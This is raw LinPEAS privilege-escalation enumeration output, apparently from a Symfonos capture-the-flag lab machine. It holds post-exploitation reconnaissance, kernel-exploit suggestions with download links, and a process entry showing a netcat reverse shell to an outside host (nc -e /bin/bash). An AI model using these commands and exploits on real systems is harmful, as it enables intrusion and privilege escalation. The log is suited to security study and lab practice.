ââââââââââââââ
âââââââ ââââââââ
âââââââ ââââââââââââââââââââ ââââ
ââââ â ââââââââââââââââââââââââââââââ ââââââ
â âââââââââââââââââââââââââââââââââââââââââââââ
ââââââââââââââââââââ âââââ âââââââââââââââââ
âââââââââââ ââââââ ââââââ â
ââââââ ââââââââ ââââ
ââ âââ âââââ âââ
ââ ââââââââââââ ââ
â ââ âââââââââââââââââââââââââââââ ââ
â âââââââââââââââââââââââââââââââââââââââââââ
ââââââââââââââ ââââ
âââââ âââââ ââââââ ââââ
ââââ âââââ âââââ â ââ
âââââ âââââ âââââââ âââââ âââââ
ââââââ âââââââ âââââââ âââââââ âââââ
ââââââââââââââ â âââââââââââââââ
âââââââââââââ ââââââââââââââ
âââââââââââ ââââââââââââââ
ââââââââââââââââââ ââââââââââââââââââââ
âââââ ââââââââââââââââââââââââââ âââââââââââââ
ââââââââ ââââââââââ ââââââââ
âââââââââââââââââââââââ
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Learn Cloud Hacking : https://training.hacktricks.xyz |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
LinPEAS-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting LinPEAS. Caching Writable Folders...
âââââââââââââââââââââ
ââââââââââââââââââââââââââââââââĢ Basic information â âââââââââââââââââââââââââââââââ
âââââââââââââââââââââ
OS: Linux version 4.9.0-9-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16)
User & Groups: uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Hostname: symfonos
[+] /bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (LinPEAS can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
ââââââââââââââââââââââ
âââââââââââââââââââââââââââââââĢ System Information â ââââââââââââââââââââââââââââââ
ââââââââââââââââââââââ
ââââââââââââĢ Operative system
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits
Linux version 4.9.0-9-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16)
Distributor ID: Debian
Description: Debian GNU/Linux 9.9 (stretch)
Release: 9.9
Codename: stretch
ââââââââââââĢ Sudo version
sudo Not Found
ââââââââââââĢ PATH
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ââââââââââââĢ Date & uptime
Wed May 28 16:07:01 CDT 2025
16:07:01 up 1:38, 0 users, load average: 0.01, 0.01, 0.00
ââââââââââââĢ Unmounted file-system?
â Check if you can mount umounted devices
UUID=eb30c486-0c1e-420b-8b3a-ff48ca7a57b4 / ext4 errors=remount-ro 0 1
UUID=434158cb-a5e9-450c-99b8-796b15e9b3bb none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
ââââââââââââĢ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5
ââââââââââââĢ Environment
â Any private information inside environment variables?
SHLVL=3
OLDPWD=/home/helios/share
PS1=$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=8:13588
_=./linpeas.sh
TERM=xterm-256color
HISTCONTROL=ignorespace
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=96b0b1b30a3349a98f3eb573e35db6f4
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
LS_COLORS=
APACHE_RUN_GROUP=helios
APACHE_RUN_USER=helios
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
ââââââââââââĢ Searching Signature verification failed in dmesg
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed
dmesg Not Found
ââââââââââââĢ Executing Linux Exploit Suggester
â https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2019-13272] PTRACE_TRACEME
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},[ debian=9{kernel:4.9.0-*} ],debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-10149] raptor_exim_wiz
Details: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt
Exposure: less probable
Download URL: https://www.exploit-db.com/download/46996
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: less probable
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
ââââââââââââĢ Protections
ââĢ AppArmor enabled? .............. /etc/apparmor.d
ââĢ AppArmor profile? .............. unconfined
ââĢ is linuxONE? ................... s390x Not Found
ââĢ grsecurity present? ............ grsecurity Not Found
ââĢ PaX bins present? .............. PaX Not Found
ââĢ Execshield enabled? ............ Execshield Not Found
ââĢ SELinux enabled? ............... sestatus Not Found
ââĢ Seccomp enabled? ............... disabled
ââĢ User namespace? ................ enabled
ââĢ Cgroup2 enabled? ............... enabled
ââĢ Is ASLR enabled? ............... Yes
ââĢ Printer? ....................... No
ââĢ Is this a virtual machine? ..... Yes (vmware)
âââââââââââââ
ââââââââââââââââââââââââââââââââââââĢ Container â âââââââââââââââââââââââââââââââââââ
âââââââââââââ
ââââââââââââĢ Container related tools present (if any):
ââââââââââââĢ Container details
ââĢ Is this a container? ........... No
ââĢ Any running containers? ........ No
âââââââââ
ââââââââââââââââââââââââââââââââââââââĢ Cloud â âââââââââââââââââââââââââââââââââââââ
âââââââââ
/usr/bin/curl
Learn and practice cloud hacking techniques in training.hacktricks.xyz
ââĢ GCP Virtual Machine? ................. No
ââĢ GCP Cloud Funtion? ................... No
ââĢ AWS ECS? ............................. No
ââĢ AWS EC2? ............................. No
ââĢ AWS EC2 Beanstalk? ................... No
ââĢ AWS Lambda? .......................... No
ââĢ AWS Codebuild? ....................... No
ââĢ DO Droplet? .......................... No
ââĢ IBM Cloud VM? ........................ No
ââĢ Azure VM or Az metadata? ............. No
ââĢ Azure APP or IDENTITY_ENDPOINT? ...... No
ââĢ Azure Automation Account? ............ No
ââĢ Aliyun ECS? .......................... No
ââĢ Tencent CVM? ......................... No
ââââââââââââââââââââââââââââââââââââââââââââââââââ
âââââââââââââââââĢ Processes, Crons, Timers, Services and Sockets â ââââââââââââââââ
ââââââââââââââââââââââââââââââââââââââââââââââââââ
ââââââââââââĢ Running processes (cleaned)
â Check weird & unexpected proceses run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes
root 1 0.0 1.3 138844 6668 ? Ss 14:28 0:01 /sbin/init
root 213 0.0 1.0 55512 4884 ? Ss 14:28 0:00 /lib/systemd/systemd-journald
root 241 0.0 0.9 46448 4484 ? Ss 14:28 0:00 /lib/systemd/systemd-udevd
systemd+ 299 0.0 0.8 127284 4160 ? Ssl 14:28 0:02 /lib/systemd/systemd-timesyncd
root 353 0.0 0.6 250112 3172 ? Ssl 14:28 0:00 /usr/sbin/rsyslogd -n
message+ 356 0.0 0.7 45128 3696 ? Ss 14:28 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 370 0.0 0.8 37980 4284 ? Ss 14:28 0:00 /lib/systemd/systemd-logind
root 372 0.0 0.5 29664 2864 ? Ss 14:28 0:00 /usr/sbin/cron -f
root 385 0.0 0.3 14524 1792 tty1 Ss+ 14:28 0:00 /sbin/agetty --noclear tty1 linux
root 391 0.0 1.1 69952 5628 ? Ss 14:28 0:00 /usr/sbin/sshd -D
root 502 0.0 0.5 20476 2848 ? Ss 14:28 0:00 /sbin/dhclient -nw
root 517 0.0 4.8 271460 23692 ? Ss 14:28 0:00 /usr/sbin/apache2 -k start
helios 621 0.0 2.1 271768 10344 ? S 14:28 0:00 _ /usr/sbin/apache2 -k start
helios 622 0.0 2.1 271768 10344 ? S 14:28 0:00 _ /usr/sbin/apache2 -k start
helios 623 0.0 2.2 271768 10816 ? S 14:28 0:00 _ /usr/sbin/apache2 -k start
helios 624 0.0 2.2 271768 11084 ? S 14:28 0:00 _ /usr/sbin/apache2 -k start
helios 625 0.0 2.1 271768 10348 ? S 14:28 0:00 _ /usr/sbin/apache2 -k start
helios 1007 0.0 2.1 271768 10320 ? S 15:06 0:00 _ /usr/sbin/apache2 -k start
helios 1225 0.0 0.1 4276 752 ? S 16:00 0:00 _ sh -c nc -e /bin/bash 192.168.48.128 1337
helios 1226 0.0 0.5 17940 2900 ? S 16:00 0:00 _ bash
helios 1229 0.0 0.6 17956 2996 ? S 16:03 0:00 _ bash
helios 1250 0.0 0.3 18928 1900 ? S 16:03 0:00 _ /usr/bin/script -qc /bin/bash /dev/null
helios 1251 0.0 0.1 4276 788 pts/0 Ss 16:03 0:00 _ sh -c /bin/bash
helios 1252 0.0 0.9 19248 4528 pts/0 S 16:03 0:00 _ /bin/bash
helios 1506 0.0 0.4 5088 2408 pts/0 S+ 16:06 0:00 _ /bin/sh ./linpeas.sh
helios 4660 0.0 0.1 5088 904 pts/0 S+ 16:07 0:00 _ /bin/sh ./linpeas.sh
helios 4664 0.0 0.6 36772 2936 pts/0 R+ 16:07 0:00 | _ ps fauxwww
helios 4663 0.0 0.1 5088 904 pts/0 S+ 16:07 0:00 _ /bin/sh ./linpeas.sh
root 554 0.0 1.2 226256 6048 ? Ss 14:28 0:00 /usr/sbin/nmbd
mysql 603 0.0 15.9 653832 77588 ? Ssl 14:28 0:02 /usr/sbin/mysqld
root 663 0.0 0.5 20476 2876 ? Ss 14:28 0:00 /sbin/dhclient -4 -v -pf /run/dhclient.ens33.pid -lf /var/lib/dhcp/dhclient.ens33.leases -I -df /var/lib/dhcp/dhclient6.ens33.leases ens33
root 824 0.0 0.9 81180 4428 ? Ss 14:28 0:00 /usr/lib/postfix/sbin/master -w
postfix 826 0.0 1.3 83248 6596 ? S 14:28 0:00 _ pickup -l -t unix -u -c
postfix 827 0.0 1.3 83296 6720 ? S 14:28 0:00 _ qmgr -l -t unix -u
root 900 0.0 3.1 318176 15300 ? Ss 14:28 0:00 /usr/sbin/smbd
root 901 0.0 1.2 310072 6000 ? S 14:28 0:00 _ /usr/sbin/smbd
root 902 0.0 0.9 310064 4500 ? S 14:28 0:00 _ /usr/sbin/smbd
root 905 0.0 1.3 318176 6660 ? S 14:28 0:00 _ /usr/sbin/smbd
ââââââââââââĢ Processes with credentials in memory (root req)
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 process found (dump creds from memory as root)
sshd Not Found
ââââââââââââĢ Processes whose PPID belongs to a different user (not root)
â You will know if a user can somehow spawn processes as a different user
ââââââââââââĢ Files opened by processes belonging to other users
â This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME
ââââââââââââĢ Systemd PATH
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ââââââââââââĢ Cron jobs
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 722 Oct 7 2017 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Jun 28 2019 .
drwxr-xr-x 83 root root 4096 May 28 16:05 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
-rw-r--r-- 1 root root 712 Jan 1 2017 php
/etc/cron.daily:
total 52
drwxr-xr-x 2 root root 4096 Jun 28 2019 .
drwxr-xr-x 83 root root 4096 May 28 16:05 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
-rwxr-xr-x 1 root root 539 Nov 3 2018 apache2
-rwxr-xr-x 1 root root 1474 Jan 18 2019 apt-compat
-rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
-rwxr-xr-x 1 root root 1597 Jun 25 2018 dpkg
-rwxr-xr-x 1 root root 4125 May 28 2019 exim4-base
-rwxr-xr-x 1 root root 89 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db
-rwxr-xr-x 1 root root 249 May 17 2017 passwd
-rwxr-xr-x 1 root root 383 Mar 30 2019 samba
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Jun 28 2019 .
drwxr-xr-x 83 root root 4096 May 28 16:05 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Jun 28 2019 .
drwxr-xr-x 83 root root 4096 May 28 16:05 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Jun 28 2019 .
drwxr-xr-x 83 root root 4096 May 28 16:05 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
-rwxr-xr-x 1 root root 723 Dec 13 2016 man-db
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
ââââââââââââĢ System timers
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Wed 2025-05-28 16:09:00 CDT 1min 54s left Wed 2025-05-28 15:39:13 CDT 27min ago phpsessionclean.timer phpsessionclean.service
Thu 2025-05-29 02:08:05 CDT 10h left Wed 2025-05-28 14:28:52 CDT 1h 38min ago apt-daily.timer apt-daily.service
Thu 2025-05-29 06:46:39 CDT 14h left Wed 2025-05-28 14:28:52 CDT 1h 38min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Thu 2025-05-29 14:43:53 CDT 22h left Wed 2025-05-28 14:43:53 CDT 1h 23min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
ââââââââââââĢ Analyzing .timer files
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers
ââââââââââââĢ Analyzing .service files
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services
/etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/networking.service could be executing some relative path
/etc/systemd/system/mysql.service could be executing some relative path
/etc/systemd/system/mysqld.service could be executing some relative path
/etc/systemd/system/network-online.target.wants/networking.service could be executing some relative path
/lib/systemd/system/emergency.service could be executing some relative path
/lib/systemd/system/ifup@.service could be executing some relative path
/lib/systemd/system/mariadb.service could be executing some relative path
/lib/systemd/system/mariadb@.service could be executing some relative path
You can't write on systemd PATH
ââââââââââââĢ Analyzing .socket files
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
ââââââââââââĢ Unix Sockets Listening
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets
sed: -e expression #1, char 0: no previous regular expression
/anvil
/bounce
/bsmtp
/cleanup
/defer
/discard
/error
/flush
/ifmail
/lmtp
/local
/maildrop
/mailman
/pickup
/proxymap
/proxywrite
/qmgr
/relay
/retry
/rewrite
/run/dbus/system_bus_socket
ââ(Read Write)
/run/mysqld/mysqld.sock
ââ(Read Write)
/run/samba/nmbd/unexpected
ââ(Read Write)
/run/systemd/cgroups-agent
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
ââ(Read Write)
/run/systemd/journal/socket
ââ(Read Write)
/run/systemd/journal/stdout
ââ(Read Write)
/run/systemd/journal/syslog
ââ(Read Write)
/run/systemd/notify
ââ(Read Write)
/run/systemd/private
ââ(Read Write)
/run/udev/control
/scache
/scalemail-backend
/showq
/smtp
/tlsmgr
/trace
/uucp
/var/run/dbus/system_bus_socket
ââ(Read Write)
/var/run/mysqld/mysqld.sock
ââ(Read Write)
/var/run/samba/nmbd/unexpected
ââ(Read Write)
/var/spool/postfix/dev/log
ââ(Read Write)
/verify
/virtual
ââââââââââââĢ D-Bus Service Objects list
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 1 systemd root :1.0 init.scope - -
:1.1 370 systemd-logind root :1.1 systemd-logind.service - -
:1.9 6879 busctl helios :1.9 apache2.service - -
org.freedesktop.DBus 356 dbus-daemon[0m messagebus org.freedesktop.DBus dbus.service - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 370 systemd-logind root :1.1 systemd-logind.service - -
org.freedesktop.network1 - - - (activatable) - -
org.freedesktop.resolve1 - - - (activatable) - -
org.freedesktop.systemd1 1 systemd root :1.0 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - -
ââââââââââââĢ D-Bus config files
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.network1.conf ( <policy user="systemd-network">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.resolve1.conf ( <policy user="systemd-resolve">)
âââââââââââââââââââââââ
âââââââââââââââââââââââââââââââĢ Network Information â ââââââââââââââââââââââââââââââ
âââââââââââââââââââââââ
ââââââââââââĢ Interfaces
default 0.0.0.0
loopback 127.0.0.0
link-local 169.254.0.0
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:95:12:de brd ff:ff:ff:ff:ff:ff
inet 192.168.48.134/24 brd 192.168.48.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe95:12de/64 scope link
valid_lft forever preferred_lft forever
ââââââââââââĢ Hostname, hosts and DNS
symfonos
127.0.0.1 localhost
127.0.1.1 symfonos
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
domain localdomain
search localdomain
nameserver 192.168.48.2
ââââââââââââĢ Active Ports
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 50 *:139 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 100 *:25 *:*
tcp LISTEN 0 50 *:445 *:*
tcp LISTEN 0 50 :::139 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 100 :::25 :::*
tcp LISTEN 0 50 :::445 :::*
ââââââââââââĢ Can I sniff with tcpdump?
No
âââââââââââââââââââââ
ââââââââââââââââââââââââââââââââĢ Users Information â âââââââââââââââââââââââââââââââ
âââââââââââââââââââââ
ââââââââââââĢ My user
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
ââââââââââââĢ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
ââââââââââââĢ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
ââââââââââââĢ Checking sudo tokens
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused
ââââââââââââĢ Checking Pkexec policy
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2
ââââââââââââĢ Superusers
root:x:0:0:root:/root:/bin/bash
ââââââââââââĢ Users with console
helios:x:1000:1000:,,,:/home/helios:/bin/bash
root:x:0:0:root:/root:/bin/bash
ââââââââââââĢ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(Debian-exim) gid=109(Debian-exim) groups=109(Debian-exim)
uid=106(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=108(mysql) gid=114(mysql) groups=114(mysql)
uid=109(postfix) gid=115(postfix) groups=115(postfix)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
ââââââââââââĢ Login now
16:07:06 up 1:38, 0 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ââââââââââââĢ Last logons
root pts/0 Fri Jun 28 20:02:55 2019 - crash (00:20) 192.168.201.133
helios pts/0 Fri Jun 28 19:58:43 2019 - Fri Jun 28 19:59:12 2019 (00:00) 192.168.201.133
helios pts/0 Fri Jun 28 19:58:23 2019 - Fri Jun 28 19:58:24 2019 (00:00) 192.168.201.133
root pts/0 Fri Jun 28 19:48:43 2019 - Fri Jun 28 19:58:17 2019 (00:09) 192.168.201.133
root pts/0 Fri Jun 28 19:38:22 2019 - Fri Jun 28 19:46:18 2019 (00:07) 192.168.201.133
helios pts/0 Fri Jun 28 19:32:27 2019 - Fri Jun 28 19:37:52 2019 (00:05) 192.168.201.133
helios pts/0 Fri Jun 28 19:31:40 2019 - Fri Jun 28 19:31:51 2019 (00:00) 192.168.201.133
reboot system boot Fri Jun 28 19:30:35 2019 still running 0.0.0.0
wtmp begins Fri Jun 28 19:30:35 2019
ââââââââââââĢ Last time logon each user
Username Port From Latest
root pts/0 172.16.52.129 Fri Jun 28 21:09:22 -0500 2019
helios pts/0 192.168.201.133 Fri Jun 28 19:58:43 -0500 2019
ââââââââââââĢ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
ââââââââââââĢ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
ââââââââââââââââââââââââ
ââââââââââââââââââââââââââââââĢ Software Information â âââââââââââââââââââââââââââââ
ââââââââââââââââââââââââ
ââââââââââââĢ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/gcc
/bin/nc
/bin/nc.traditional
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/socat
/usr/bin/wget
ââââââââââââĢ Installed Compilers
ii gcc 4:6.3.0-4 amd64 GNU C compiler
ii gcc-6 6.3.0-18+deb9u1 amd64 GNU C compiler
/usr/bin/gcc
ââââââââââââĢ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.25 (Debian)
Server built: 2019-04-02T19:05:13
httpd Not Found
Nginx version: nginx Not Found
/etc/apache2/mods-available/php7.0.conf-<FilesMatch ".+\.ph(p[3457]?|t|tml)$">
/etc/apache2/mods-available/php7.0.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.0.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.0.conf: SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-enabled/php7.0.conf-<FilesMatch ".+\.ph(p[3457]?|t|tml)$">
/etc/apache2/mods-enabled/php7.0.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.0.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.0.conf: SetHandler application/x-httpd-php-source
